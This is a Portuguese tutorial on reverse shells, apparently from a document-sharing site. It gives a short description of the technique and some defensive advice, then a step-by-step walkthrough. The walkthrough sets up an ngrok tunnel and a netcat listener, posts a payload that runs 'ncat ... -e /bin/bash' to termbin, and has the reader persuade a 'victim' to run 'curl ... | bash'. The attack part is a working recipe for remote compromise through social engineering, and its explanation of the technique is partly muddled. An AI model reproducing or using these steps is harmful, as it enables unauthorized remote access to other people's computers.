Você está na página 1de 3

Shell Reverse

Oque é?

● Shell Reverse é um tipo de técnica de invasão de segurança usada para obter o acesso
ao computador de um usuário. Ela funciona criando uma conexão de shell reversa
entre um atacante e seu alvo de modo que o invasor tenha acesso remoto ao
computador do alvo. Com isso, ele pode usar a máquina comprometida para realizar
inúmeros tipos de atividades, desde obter informações confidenciais a invadir outros
dispositivos da rede.

Como funciona?

● Shell reverse é executado usando software como SSH (Secure Shell) para estabelecer a
conexão remota. O atacante primeiro precisa identificar uma vulnerabilidade no
dispositivo de destino, como por exemplo, um bug de aplicação ou falha de
configuração, que lhe dá acesso à máquina do alvo. O software é configurado para
criar um "túnel" entre o atacante e o alvo, através do qual o atacante tem acesso aos
recursos e arquivos contidos no sistema alvo.
Depois que o atacante tem acesso à máquina comprometida, ele pode usar recursos
como controle remoto, acesso ao sistema de arquivos, softwares de monitoramento,
acesso a dados sensíveis, gerenciamento de aplicações remotas, etc.

Lado Negativo

● A técnica de shell reversa também tem seu lado negativo. Primeiro, ela é usada
principalmente por invasores maliciosos, onde uma conexão inadvertida pode
acarretar em grande prejuízo para o usuário vítima. Por isso, é muito importante que
o usuário mantenha todos os seus dispositivos de forma segura e atualizada. Além
disso, é recomendável que sejam usados softwares de proteção de segurança como
firewalls, antivírus e anti-spyware para evitar comprometimento das máquinas.
Usar a técnica shell reverse exige conhecimento técnico avançado, portanto
recomenda-se que sejam usados softwares de segurança de qualidade por parte dos
usuários que desejam se proteger de possíveis ameaças que possam vir de invasores.
É importante também que sejam feitas verificações regulares nos recursos usados
para prevenir ataques shell reversa no seu ambiente de trabalho.

Como fazer
1 - Faça a instalação do Ngrok pelo Site Oficial e Descompacte o arquivo.

https://ngrok.com/download

2 - Agora no Terminal insira seu token de autenticação desse jeito:

> ngrok authtoken <token>

3 - Agora inicie o ngrok para receber Pacotes TCP:

> ngrok tcp <port>

4 - Agora será necessário pegar o IP do domínio usando o ping:

> ping <LHOST>

Como vimos na imagem o Ip do domínio é "18.231.93.153".

5 - Agora vamos ver a porta do servidor:

Como vemos no print acima a porta é “12696”

6 - Agora só instalar o ncat ou o netcat (a "vítima" também vai precisar do netcat


instalado).

> apt-get install netcat

Depois de fazer a instalação é só iniciar o netcat com o seguinte comando:

> nc -lvp <port>

Certo se você tiver feito tudo certo no final terá duas abas, uma com o ngrok e a outra
com o netcat, agora você vai abrir uma terceira aba.
Nessa aba você irá executar o seguinte comando:

> echo "pkg install nmap-ncat -y && ncat <IP Do Domínio> <porta> -e /bin/bash"
| nc termbin.com 9999

Esse comando irá retornar um link, você copia esse link, agora só basta enviar e
convencer a "vítima" a executar o seguinte código:

curl -s <link do termbin> | bash

Volte para a aba do netcat e aguarde a vítima se conectar.

Você também pode gostar